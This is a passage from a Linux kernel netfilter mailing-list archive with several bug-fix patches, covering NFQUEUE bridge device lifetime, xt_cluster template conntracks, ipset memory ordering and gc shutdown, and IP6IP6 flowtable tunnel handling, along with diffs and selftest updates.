teardown has started. The problem is not that every bridged packet needs
its own dst reference. The problem is that NFQUEUE can keep the bridge
private fake dst alive after unregister begins.

Fix this by keeping the bridge fake dst model unchanged and pinning the
bridge master device only while the packet sits in NFQUEUE. Record the
bridge device in nf_queue_entry when the queued skb carries a bridge fake
dst, take a device reference for the queue lifetime, and drop it when the
queue entry is freed.

Also make sure queued entries are reaped when that bridge device goes
down, and drop the redundant nf_bridge_info_exists() test from the fake
dst detection.

This keeps netdev_priv(br->dev) alive until verdict completion, so the
embedded fake rtable and its metrics backing storage cannot be freed out
from under dst_release(). It also avoids the constant refcount bump and
avoids using ipv4-specific dst helpers for IPv6 bridge traffic.

Fixes: 34666d467cbf ("netfilter: bridge: move br_netfilter out of the core")
Cc: stable@kernel.org
Reported-by: Yuan Tan <yuantan098@gmail.com>
Reported-by: Yifan Wu <yifanwucs@gmail.com>
Reported-by: Juefei Pu <tomapufckgml@gmail.com>
Reported-by: Xin Liu <bird@lzu.edu.cn>
Signed-off-by: Haoze Xie <royenheart@gmail.com>
Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 include/net/netfilter/nf_queue.h |  1 +
 net/netfilter/nf_queue.c         | 14 ++++++++++++++
 net/netfilter/nfnetlink_queue.c  |  3 +++
 3 files changed, 18 insertions(+)

diff --git a/include/net/netfilter/nf_queue.h b/include/net/netfilter/nf_queue.h
index 3978c3174cdb..fc3e81c07364 100644
--- a/include/net/netfilter/nf_queue.h
+++ b/include/net/netfilter/nf_queue.h
@@ -18,6 +18,7 @@ struct nf_queue_entry {
 	unsigned int		id;
 	unsigned int		hook_index;	/* index in hook_entries->hook[] */
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+	struct net_device	*bridge_dev;
 	struct net_device	*physin;
 	struct net_device	*physout;
 #endif
diff --git a/net/netfilter/nf_queue.c b/net/netfilter/nf_queue.c
index 57b450024a99..73363ceedebe 100644
--- a/net/netfilter/nf_queue.c
+++ b/net/netfilter/nf_queue.c
@@ -68,6 +68,7 @@ static void nf_queue_entry_release_refs(struct nf_queue_entry *entry)
 		nf_queue_sock_put(state->sk);
 
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+	dev_put(entry->bridge_dev);
 	dev_put(entry->physin);
 	dev_put(entry->physout);
 #endif
@@ -84,6 +85,8 @@ static void __nf_queue_entry_init_physdevs(struct nf_queue_entry *entry)
 {
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
 	const struct sk_buff *skb = entry->skb;
+	struct dst_entry *dst = skb_dst(skb);
+	struct net_device *dev = NULL;
 
 	if (nf_bridge_info_exists(skb)) {
 		entry->physin = nf_bridge_get_physindev(skb, entry->state.net);
@@ -92,6 +95,16 @@ static void __nf_queue_entry_init_physdevs(struct nf_queue_entry *entry)
 		entry->physin = NULL;
 		entry->physout = NULL;
 	}
+
+	if (entry->state.pf == NFPROTO_BRIDGE &&
+	    dst && (dst->flags & DST_FAKE_RTABLE))
+		dev = dst_dev_rcu(dst);
+
+	/* Must hold a reference on the bridge device: dst_hold() protects
+	 * the dst itself, but the fake rtable is embedded in bridge-private
+	 * storage that netdevice teardown can free independently.
+	 */
+	entry->bridge_dev = dev;
 #endif
 }
 
@@ -108,6 +121,7 @@ bool nf_queue_entry_get_refs(struct nf_queue_entry *entry)
 	dev_hold(state->out);
 
 #if IS_ENABLED(CONFIG_BRIDGE_NETFILTER)
+	dev_hold(entry->bridge_dev);
 	dev_hold(entry->physin);
 	dev_hold(entry->physout);
 #endif
diff --git a/net/netfilter/nfnetlink_queue.c b/net/netfilter/nfnetlink_queue.c
index c5e29fec419b..80ca077b81bd 100644
--- a/net/netfilter/nfnetlink_queue.c
+++ b/net/netfilter/nfnetlink_queue.c
@@ -1262,6 +1262,9 @@ dev_cmp(struct nf_queue_entry *entry, unsigned long ifindex)
 
 	if (physinif == ifindex || physoutif == ifindex)
 		return 1;
+
+	if (entry->bridge_dev && entry->bridge_dev->ifindex == ifindex)
+		return 1;
 #endif
 	if (entry->skb_dev && entry->skb_dev->ifindex == ifindex)
 		return 1;
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 03/14] netfilter: xt_cluster: reject template conntracks in hash match
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Wyatt Feng <bronzed_45_vested@icloud.com>

xt_cluster_mt() treats any non-NULL nf_ct_get() result as a fully
initialized conntrack and passes it to xt_cluster_hash().

This causes a state confusion bug when the raw table CT target attaches
a template conntrack to skb->_nfct before normal conntrack processing.
Templates carry IPS_TEMPLATE status but do not have a valid tuple for
hashing yet, so xt_cluster_hash() can hit its WARN_ON() path on the
zeroed l3num field.

Reject template conntracks before hashing them. This matches existing
netfilter handling for template objects and avoids hashing incomplete
conntrack state.

Fixes: 0269ea493734 ("netfilter: xtables: add cluster match")
Cc: stable@vger.kernel.org
Reported-by: Yuan Tan <yuantan098@gmail.com>
Reported-by: Yifan Wu <yifanwucs@gmail.com>
Reported-by: Juefei Pu <tomapufckgml@gmail.com>
Reported-by: Zhengchuan Liang <zcliangcn@gmail.com>
Reported-by: Xin Liu <bird@lzu.edu.cn>
Assisted-by: Codex:GPT-5.4
Signed-off-by: Wyatt Feng <bronzed_45_vested@icloud.com>
Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/xt_cluster.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/netfilter/xt_cluster.c b/net/netfilter/xt_cluster.c
index 908fd5f2c3c8..eaf2511d63f0 100644
--- a/net/netfilter/xt_cluster.c
+++ b/net/netfilter/xt_cluster.c
@@ -107,7 +107,7 @@ xt_cluster_mt(const struct sk_buff *skb, struct xt_action_param *par)
 	}
 
 	ct = nf_ct_get(skb, &ctinfo);
-	if (ct == NULL)
+	if (!ct || nf_ct_is_template(ct))
 		return false;
 
 	if (ct->master)
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 06/14] netfilter: ipset: Don't use test_bit() in lockless RCU readers in bitmap types
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

This is the counterpart of the patch "netfilter: ipset: Don't use test_bit()
in lockless RCU readers in hash types", applied to the bitmap types.

Fixes: 02a3231b6d82 ("netfilter: nf_conntrack_expect: store netns and zone in expectation")
Fixes: b0da3905bb1e ("netfilter: ipset: Bitmap types using the unified code base")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_bitmap_gen.h   | 4 +++-
 net/netfilter/ipset/ip_set_bitmap_ip.c    | 2 +-
 net/netfilter/ipset/ip_set_bitmap_ipmac.c | 2 +-
 net/netfilter/ipset/ip_set_bitmap_port.c  | 2 +-
 4 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/ipset/ip_set_bitmap_gen.h b/net/netfilter/ipset/ip_set_bitmap_gen.h
index 798c7993635e..bb9b5bed10e1 100644
--- a/net/netfilter/ipset/ip_set_bitmap_gen.h
+++ b/net/netfilter/ipset/ip_set_bitmap_gen.h
@@ -165,6 +165,7 @@ mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
 		ip_set_init_skbinfo(ext_skbinfo(x, set), ext);
 
 	/* Activate element */
+	smp_mb__before_atomic();
 	set_bit(e->id, map->members);
 	set->elements++;
 
@@ -219,7 +220,7 @@ mtype_list(const struct ip_set *set,
 		cond_resched_rcu();
 		id = cb->args[IPSET_CB_ARG0];
 		x = get_ext(set, map, id);
-		if (!test_bit(id, map->members) ||
+		if (!test_bit_acquire(id, map->members) ||
 		    (SET_WITH_TIMEOUT(set) &&
 #ifdef IP_SET_BITMAP_STORED_TIMEOUT
 		     mtype_is_filled(x) &&
@@ -278,6 +279,7 @@ mtype_gc(struct timer_list *t)
 			x = get_ext(set, map, id);
 			if (ip_set_timeout_expired(ext_timeout(x, set))) {
 				clear_bit(id, map->members);
+				smp_mb__after_atomic();
 				ip_set_ext_destroy(set, x);
 				set->elements--;
 			}
diff --git a/net/netfilter/ipset/ip_set_bitmap_ip.c b/net/netfilter/ipset/ip_set_bitmap_ip.c
index 5988b9bb9029..ac7febce074f 100644
--- a/net/netfilter/ipset/ip_set_bitmap_ip.c
+++ b/net/netfilter/ipset/ip_set_bitmap_ip.c
@@ -67,7 +67,7 @@ static int
 bitmap_ip_do_test(const struct bitmap_ip_adt_elem *e,
 		  struct bitmap_ip *map, size_t dsize)
 {
-	return !!test_bit(e->id, map->members);
+	return !!test_bit_acquire(e->id, map->members);
 }
 
 static int
diff --git a/net/netfilter/ipset/ip_set_bitmap_ipmac.c b/net/netfilter/ipset/ip_set_bitmap_ipmac.c
index 752f59ef8744..5921fd9d2dca 100644
--- a/net/netfilter/ipset/ip_set_bitmap_ipmac.c
+++ b/net/netfilter/ipset/ip_set_bitmap_ipmac.c
@@ -86,7 +86,7 @@ bitmap_ipmac_do_test(const struct bitmap_ipmac_adt_elem *e,
 {
 	const struct bitmap_ipmac_elem *elem;
 
-	if (!test_bit(e->id, map->members))
+	if (!test_bit_acquire(e->id, map->members))
 		return 0;
 	elem = get_const_elem(map->extensions, e->id, dsize);
 	if (e->add_mac && elem->filled == MAC_FILLED)
diff --git a/net/netfilter/ipset/ip_set_bitmap_port.c b/net/netfilter/ipset/ip_set_bitmap_port.c
index 7138e080def4..ca875c982424 100644
--- a/net/netfilter/ipset/ip_set_bitmap_port.c
+++ b/net/netfilter/ipset/ip_set_bitmap_port.c
@@ -58,7 +58,7 @@ static int
 bitmap_port_do_test(const struct bitmap_port_adt_elem *e,
 		    const struct bitmap_port *map, size_t dsize)
 {
-	return !!test_bit(e->id, map->members);
+	return !!test_bit_acquire(e->id, map->members);
 }
 
 static int
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 05/14] netfilter: ipset: Don't use test_bit() in lockless RCU readers in hash types
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

Sashiko pointed out that there are a few lockless RCU readers
using test_bit(), which is a relaxed atomic operation and
provides no memory barrier guarantees. Use test_bit_acquire()
instead where the operation may run in parallel with add/del/gc,
i.e. where it is not one of the following cases:

- protected by region lock
- in a set destroy phase
- in a new/temporary set creation phase
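
For illustration only, the ordering problem can be modelled in userspace
with C11 atomics. This is a minimal sketch, not the ipset code: struct
bucket, bucket_add() and bucket_test() are hypothetical names, and the
release/acquire pair stands in for the kernel's barrier plus set_bit() on
the writer side and test_bit_acquire() on the reader side.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>

#define SLOTS 64

/* Hypothetical userspace model of a bucket: a "used" bitmap plus data. */
struct bucket {
	_Atomic uint64_t used;		/* bit i set => value[i] is published */
	uint32_t value[SLOTS];
};

/* Writer: fill the slot first, then publish it with release semantics. */
static void bucket_add(struct bucket *b, unsigned int i, uint32_t v)
{
	b->value[i] = v;
	atomic_fetch_or_explicit(&b->used, UINT64_C(1) << i,
				 memory_order_release);
}

/* Reader: the acquire load pairs with the release above, so a reader
 * that observes the bit also observes the value stored before it.
 * A relaxed load would not give that guarantee.
 */
static bool bucket_test(struct bucket *b, unsigned int i, uint32_t *out)
{
	uint64_t used = atomic_load_explicit(&b->used, memory_order_acquire);

	if (!(used & (UINT64_C(1) << i)))
		return false;
	*out = b->value[i];
	return true;
}
```

The three excluded cases above need no acquire because the reader there
cannot race with a concurrent writer.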

Fixes: 18f84d41d34f ("netfilter: ipset: Introduce RCU locking in hash:* types")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_hash_gen.h | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/net/netfilter/ipset/ip_set_hash_gen.h b/net/netfilter/ipset/ip_set_hash_gen.h
index 04e4627ddfc1..00c27b95207f 100644
--- a/net/netfilter/ipset/ip_set_hash_gen.h
+++ b/net/netfilter/ipset/ip_set_hash_gen.h
@@ -689,7 +689,7 @@ mtype_resize(struct ip_set *set, bool retried)
 				continue;
 			pos = smp_load_acquire(&n->pos);
 			for (j = 0; j < pos; j++) {
-				if (!test_bit(j, n->used))
+				if (!test_bit_acquire(j, n->used))
 					continue;
 				data = ahash_data(n, j, dsize);
 				if (SET_ELEM_EXPIRED(set, data))
@@ -826,7 +826,7 @@ mtype_ext_size(struct ip_set *set, u32 *elements, size_t *ext_size)
 				continue;
 			pos = smp_load_acquire(&n->pos);
 			for (j = 0; j < pos; j++) {
-				if (!test_bit(j, n->used))
+				if (!test_bit_acquire(j, n->used))
 					continue;
 				data = ahash_data(n, j, set->dsize);
 				if (!SET_ELEM_EXPIRED(set, data))
@@ -1201,7 +1201,7 @@ mtype_test_cidrs(struct ip_set *set, struct mtype_elem *d,
 			continue;
 		pos = smp_load_acquire(&n->pos);
 		for (i = 0; i < pos; i++) {
-			if (!test_bit(i, n->used))
+			if (!test_bit_acquire(i, n->used))
 				continue;
 			data = ahash_data(n, i, set->dsize);
 			if (!mtype_data_equal(data, d, &multi))
@@ -1259,7 +1259,7 @@ mtype_test(struct ip_set *set, void *value, const struct ip_set_ext *ext,
 	}
 	pos = smp_load_acquire(&n->pos);
 	for (i = 0; i < pos; i++) {
-		if (!test_bit(i, n->used))
+		if (!test_bit_acquire(i, n->used))
 			continue;
 		data = ahash_data(n, i, set->dsize);
 		if (!mtype_data_equal(data, d, &multi))
@@ -1396,7 +1396,7 @@ mtype_list(const struct ip_set *set,
 			continue;
 		pos = smp_load_acquire(&n->pos);
 		for (i = 0; i < pos; i++) {
-			if (!test_bit(i, n->used))
+			if (!test_bit_acquire(i, n->used))
 				continue;
 			e = ahash_data(n, i, set->dsize);
 			if (SET_ELEM_EXPIRED(set, e))
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 04/14] netfilter: flowtable: fix and simplify IP6IP6 tunnel handling
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Lorenzo Bianconi <lorenzo@kernel.org>

Fix nf_flow_ip6_tunnel_proto() to use pskb_may_pull() instead of
skb_header_pointer() to ensure the outer IPv6 header is in the skb
linear area, which is required for subsequent packet processing. Move
ctx->offset update inside the IPPROTO_IPV6 conditional block since it
should only be adjusted when an IP6IP6 tunnel is actually detected.
Simplify the rx path by removing ipv6_skip_exthdr() and checking
ip6h->nexthdr directly, as the flowtable fast path only handles simple
IP6IP6 encapsulation without extension headers.
Drop the tunnel encapsulation limit destination option support from the
tx path to match, since the rx path no longer handles extension headers.
Remove the encap_limit parameter from nf_flow_offload_ipv6_forward(),
nf_flow_tunnel_ip6ip6_push() and nf_flow_tunnel_v6_push(), along with
the ipv6_tel_txoption struct and related headroom/MTU adjustments.
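
As a rough illustration of the simplified rx check described above, here is
a userspace sketch operating on a raw byte buffer. It is an assumption-laden
model, not the kernel function: struct tun_ctx, is_ext_hdr() and
ip6_tunnel_proto() are hypothetical names, and the length check stands in
for pskb_may_pull().

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define IPV6_HDR_LEN	40u
#define PROTO_IPV6	41u	/* IPv6-in-IPv6 encapsulation */

/* Hypothetical context mirroring the fields the commit message mentions. */
struct tun_ctx {
	uint32_t offset;
	uint8_t tun_proto;
	uint32_t tun_hdr_size;
};

/* Next-header values that denote an IPv6 extension header. */
static bool is_ext_hdr(uint8_t nexthdr)
{
	return nexthdr == 0 || nexthdr == 43 || nexthdr == 44 ||
	       nexthdr == 51 || nexthdr == 59 || nexthdr == 60;
}

/* Returns false when the packet must take the slow path. */
static bool ip6_tunnel_proto(struct tun_ctx *ctx, const uint8_t *pkt,
			     size_t len)
{
	const uint8_t *ip6h;

	if (len < ctx->offset + IPV6_HDR_LEN)
		return false;
	ip6h = pkt + ctx->offset;
	if (ip6h[7] <= 1)		/* hop limit */
		return false;
	if (is_ext_hdr(ip6h[6]))	/* next header */
		return false;
	if (ip6h[6] == PROTO_IPV6) {
		/* Only advance the offset when a tunnel is detected. */
		ctx->tun_proto = ip6h[6];
		ctx->tun_hdr_size = IPV6_HDR_LEN;
		ctx->offset += ctx->tun_hdr_size;
	}
	return true;
}
```

Note that a plain (non-tunnel) packet still returns true but leaves the
offset untouched, which is the behaviour the ctx->offset move is after.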

Fixes: d98103575dcdd ("netfilter: flowtable: Add IP6IP6 rx sw acceleration")
Signed-off-by: Lorenzo Bianconi <lorenzo@kernel.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/ipv6/ip6_tunnel.c                         |  7 ++
 net/netfilter/nf_flow_table_ip.c              | 80 +++++--------------
 .../selftests/net/netfilter/nft_flowtable.sh  |  8 +-
 3 files changed, 30 insertions(+), 65 deletions(-)

diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
index d7c90a8533ec..bf8e40af60b0 100644
--- a/net/ipv6/ip6_tunnel.c
+++ b/net/ipv6/ip6_tunnel.c
@@ -1851,6 +1851,13 @@ static int ip6_tnl_fill_forward_path(struct net_device_path_ctx *ctx,
 	struct dst_entry *dst;
 	int err;
 
+	if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT)) {
+		/* encaplimit option is currently not supported in the
+		 * sw-acceleration path.
+		 */
+		return -EOPNOTSUPP;
+	}
+
 	dst = ip6_route_output(dev_net(ctx->dev), NULL, &fl6);
 	if (!dst->error) {
 		path->type = DEV_PATH_TUN;
diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
index 9c05a50d6013..e7a3fb2b2d94 100644
--- a/net/netfilter/nf_flow_table_ip.c
+++ b/net/netfilter/nf_flow_table_ip.c
@@ -347,29 +347,23 @@ static bool nf_flow_ip6_tunnel_proto(struct nf_flowtable_ctx *ctx,
 				     struct sk_buff *skb)
 {
 #if IS_ENABLED(CONFIG_IPV6)
-	struct ipv6hdr *ip6h, _ip6h;
-	__be16 frag_off;
-	u8 nexthdr;
-	int hdrlen;
+	struct ipv6hdr *ip6h;
 
-	ip6h = skb_header_pointer(skb, ctx->offset, sizeof(*ip6h), &_ip6h);
-	if (!ip6h)
+	if (!pskb_may_pull(skb, sizeof(*ip6h) + ctx->offset))
 		return false;
 
+	ip6h = (struct ipv6hdr *)(skb_network_header(skb) + ctx->offset);
 	if (ip6h->hop_limit <= 1)
 		return false;
 
-	nexthdr = ip6h->nexthdr;
-	hdrlen = ipv6_skip_exthdr(skb, sizeof(*ip6h) + ctx->offset, &nexthdr,
-				  &frag_off);
-	if (hdrlen < 0)
+	if (ipv6_ext_hdr(ip6h->nexthdr))
 		return false;
 
-	if (nexthdr == IPPROTO_IPV6) {
-		ctx->tun.hdr_size = hdrlen;
-		ctx->tun.proto = IPPROTO_IPV6;
+	if (ip6h->nexthdr == IPPROTO_IPV6) {
+		ctx->tun.proto = ip6h->nexthdr;
+		ctx->tun.hdr_size = sizeof(*ip6h);
+		ctx->offset += ctx->tun.hdr_size;
 	}
-	ctx->offset += ctx->tun.hdr_size;
 
 	return true;
 #else
@@ -648,25 +642,19 @@ static int nf_flow_tunnel_v4_push(struct net *net, struct sk_buff *skb,
 	return 0;
 }
 
-struct ipv6_tel_txoption {
-	struct ipv6_txoptions ops;
-	__u8 dst_opt[8];
-};
-
 static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 				      struct flow_offload_tuple *tuple,
-				      struct in6_addr **ip6_daddr,
-				      int encap_limit)
+				      struct in6_addr **ip6_daddr)
 {
 	struct ipv6hdr *ip6h = (struct ipv6hdr *)skb_network_header(skb);
-	u8 hop_limit = ip6h->hop_limit, proto = IPPROTO_IPV6;
 	struct rtable *rt = dst_rtable(tuple->dst_cache);
 	__u8 dsfield = ipv6_get_dsfield(ip6h);
 	struct flowi6 fl6 = {
 		.daddr = tuple->tun.src_v6,
 		.saddr = tuple->tun.dst_v6,
-		.flowi6_proto = proto,
+		.flowi6_proto = IPPROTO_IPV6,
 	};
+	u8 hop_limit = ip6h->hop_limit;
 	int err, mtu;
 	u32 headroom;
 
@@ -674,41 +662,18 @@ static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 	if (err)
 		return err;
 
-	skb_set_inner_ipproto(skb, proto);
+	skb_set_inner_ipproto(skb, IPPROTO_IPV6);
 	headroom = sizeof(*ip6h) + LL_RESERVED_SPACE(rt->dst.dev) +
 		   rt->dst.header_len;
-	if (encap_limit)
-		headroom += 8;
 	err = skb_cow_head(skb, headroom);
 	if (err)
 		return err;
 
 	skb_scrub_packet(skb, true);
 	mtu = dst_mtu(&rt->dst) - sizeof(*ip6h);
-	if (encap_limit)
-		mtu -= 8;
 	mtu = max(mtu, IPV6_MIN_MTU);
 	skb_dst_update_pmtu_no_confirm(skb, mtu);
 
-	if (encap_limit > 0) {
-		struct ipv6_tel_txoption opt = {
-			.dst_opt[2] = IPV6_TLV_TNL_ENCAP_LIMIT,
-			.dst_opt[3] = 1,
-			.dst_opt[4] = encap_limit,
-			.dst_opt[5] = IPV6_TLV_PADN,
-			.dst_opt[6] = 1,
-		};
-		struct ipv6_opt_hdr *hopt;
-
-		opt.ops.dst1opt = (struct ipv6_opt_hdr *)opt.dst_opt;
-		opt.ops.opt_nflen = 8;
-
-		hopt = skb_push(skb, ipv6_optlen(opt.ops.dst1opt));
-		memcpy(hopt, opt.ops.dst1opt, ipv6_optlen(opt.ops.dst1opt));
-		hopt->nexthdr = IPPROTO_IPV6;
-		proto = NEXTHDR_DEST;
-	}
-
 	skb_push(skb, sizeof(*ip6h));
 	skb_reset_network_header(skb);
 
@@ -716,7 +681,7 @@ static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 	ip6_flow_hdr(ip6h, dsfield,
 		     ip6_make_flowlabel(net, skb, fl6.flowlabel, true, &fl6));
 	ip6h->hop_limit = hop_limit;
-	ip6h->nexthdr = proto;
+	ip6h->nexthdr = IPPROTO_IPV6;
 	ip6h->daddr = tuple->tun.src_v6;
 	ip6h->saddr = tuple->tun.dst_v6;
 	ipv6_hdr(skb)->payload_len = htons(skb->len - sizeof(*ip6h));
@@ -729,12 +694,10 @@ static int nf_flow_tunnel_ip6ip6_push(struct net *net, struct sk_buff *skb,
 
 static int nf_flow_tunnel_v6_push(struct net *net, struct sk_buff *skb,
 				  struct flow_offload_tuple *tuple,
-				  struct in6_addr **ip6_daddr,
-				  int encap_limit)
+				  struct in6_addr **ip6_daddr)
 {
 	if (tuple->tun_num)
-		return nf_flow_tunnel_ip6ip6_push(net, skb, tuple, ip6_daddr,
-						  encap_limit);
+		return nf_flow_tunnel_ip6ip6_push(net, skb, tuple, ip6_daddr);
 
 	return 0;
 }
@@ -1089,7 +1052,7 @@ static int nf_flow_tuple_ipv6(struct nf_flowtable_ctx *ctx, struct sk_buff *skb,
 static int nf_flow_offload_ipv6_forward(struct nf_flowtable_ctx *ctx,
 					struct nf_flowtable *flow_table,
 					struct flow_offload_tuple_rhash *tuplehash,
-					struct sk_buff *skb, int encap_limit)
+					struct sk_buff *skb)
 {
 	enum flow_offload_tuple_dir dir;
 	struct flow_offload *flow;
@@ -1100,11 +1063,8 @@ static int nf_flow_offload_ipv6_forward(struct nf_flowtable_ctx *ctx,
 	flow = container_of(tuplehash, struct flow_offload, tuplehash[dir]);
 
 	mtu = flow->tuplehash[dir].tuple.mtu + ctx->offset;
-	if (flow->tuplehash[!dir].tuple.tun_num) {
+	if (flow->tuplehash[!dir].tuple.tun_num)
 		mtu -= sizeof(*ip6h);
-		if (encap_limit > 0)
-			mtu -= 8; /* encap limit option */
-	}
 
 	if (unlikely(nf_flow_exceeds_mtu(skb, mtu)))
 		return 0;
@@ -1158,7 +1118,6 @@ unsigned int
 nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
 			  const struct nf_hook_state *state)
 {
-	int encap_limit = IPV6_DEFAULT_TNL_ENCAP_LIMIT;
 	struct flow_offload_tuple_rhash *tuplehash;
 	struct nf_flowtable *flow_table = priv;
 	struct flow_offload_tuple *other_tuple;
@@ -1177,8 +1136,7 @@ nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
 	if (tuplehash == NULL)
 		return NF_ACCEPT;
 
-	ret = nf_flow_offload_ipv6_forward(&ctx, flow_table, tuplehash, skb,
-					   encap_limit);
+	ret = nf_flow_offload_ipv6_forward(&ctx, flow_table, tuplehash, skb);
 	if (ret < 0)
 		return NF_DROP;
 	else if (ret == 0)
@@ -1198,7 +1156,7 @@ nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
 	ip6_daddr = &other_tuple->src_v6;
 
 	if (nf_flow_tunnel_v6_push(state->net, skb, other_tuple,
-				   &ip6_daddr, encap_limit) < 0)
+				   &ip6_daddr) < 0)
 		return NF_DROP;
 
 	switch (tuplehash->tuple.xmit_type) {
diff --git a/tools/testing/selftests/net/netfilter/nft_flowtable.sh b/tools/testing/selftests/net/netfilter/nft_flowtable.sh
index 7a34ef468975..08ad07500e8a 100755
--- a/tools/testing/selftests/net/netfilter/nft_flowtable.sh
+++ b/tools/testing/selftests/net/netfilter/nft_flowtable.sh
@@ -592,7 +592,7 @@ ip -net "$nsr1" link set tun0 up
 ip -net "$nsr1" addr add 192.168.100.1/24 dev tun0
 ip netns exec "$nsr1" sysctl net.ipv4.conf.tun0.forwarding=1 > /dev/null
 
-ip -net "$nsr1" link add name tun6 type ip6tnl local fee1:2::1 remote fee1:2::2
+ip -net "$nsr1" link add name tun6 type ip6tnl local fee1:2::1 remote fee1:2::2 encaplimit none
 ip -net "$nsr1" link set tun6 up
 ip -net "$nsr1" addr add fee1:3::1/64 dev tun6 nodad
 
@@ -601,7 +601,7 @@ ip -net "$nsr2" link set tun0 up
 ip -net "$nsr2" addr add 192.168.100.2/24 dev tun0
 ip netns exec "$nsr2" sysctl net.ipv4.conf.tun0.forwarding=1 > /dev/null
 
-ip -net "$nsr2" link add name tun6 type ip6tnl local fee1:2::2 remote fee1:2::1 || ret=1
+ip -net "$nsr2" link add name tun6 type ip6tnl local fee1:2::2 remote fee1:2::1 encaplimit none || ret=1
 ip -net "$nsr2" link set tun6 up
 ip -net "$nsr2" addr add fee1:3::2/64 dev tun6 nodad
 
@@ -651,7 +651,7 @@ ip -net "$nsr1" route change default via 192.168.200.2
 ip netns exec "$nsr1" sysctl net.ipv4.conf.tun0/10.forwarding=1 > /dev/null
 ip netns exec "$nsr1" nft -a insert rule inet filter forward 'meta oif tun0.10 accept'
 
-ip -net "$nsr1" link add name tun6.10 type ip6tnl local fee1:4::1 remote fee1:4::2
+ip -net "$nsr1" link add name tun6.10 type ip6tnl local fee1:4::1 remote fee1:4::2 encaplimit none
 ip -net "$nsr1" link set tun6.10 up
 ip -net "$nsr1" addr add fee1:5::1/64 dev tun6.10 nodad
 ip -6 -net "$nsr1" route delete default
@@ -670,7 +670,7 @@ ip -net "$nsr2" addr add 192.168.200.2/24 dev tun0.10
 ip -net "$nsr2" route change default via 192.168.200.1
 ip netns exec "$nsr2" sysctl net.ipv4.conf.tun0/10.forwarding=1 > /dev/null
 
-ip -net "$nsr2" link add name tun6.10 type ip6tnl local fee1:4::2 remote fee1:4::1 || ret=1
+ip -net "$nsr2" link add name tun6.10 type ip6tnl local fee1:4::2 remote fee1:4::1 encaplimit none || ret=1
 ip -net "$nsr2" link set tun6.10 up
 ip -net "$nsr2" addr add fee1:5::2/64 dev tun6.10 nodad
 ip -6 -net "$nsr2" route delete default
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 08/14] netfilter: ipset: make sure gc is properly stopped
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Jozsef Kadlecsik <kadlec@netfilter.org>

Sashiko noticed that when destroying a set,
cancel_delayed_work_sync() was called while gc
calls queue_delayed_work() unconditionally, which
can result in the gc not being shut down properly.

Fixes: f66ee0410b1c ("netfilter: ipset: Fix "INFO: rcu detected stall in hash_xxx" reports")
Signed-off-by: Jozsef Kadlecsik <kadlec@netfilter.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/ipset/ip_set_hash_gen.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/netfilter/ipset/ip_set_hash_gen.h b/net/netfilter/ipset/ip_set_hash_gen.h
index 00c27b95207f..dedf59b661dd 100644
--- a/net/netfilter/ipset/ip_set_hash_gen.h
+++ b/net/netfilter/ipset/ip_set_hash_gen.h
@@ -606,7 +606,7 @@ mtype_cancel_gc(struct ip_set *set)
 	struct htype *h = set->data;
 
 	if (SET_WITH_TIMEOUT(set))
-		cancel_delayed_work_sync(&h->gc.dwork);
+		disable_delayed_work_sync(&h->gc.dwork);
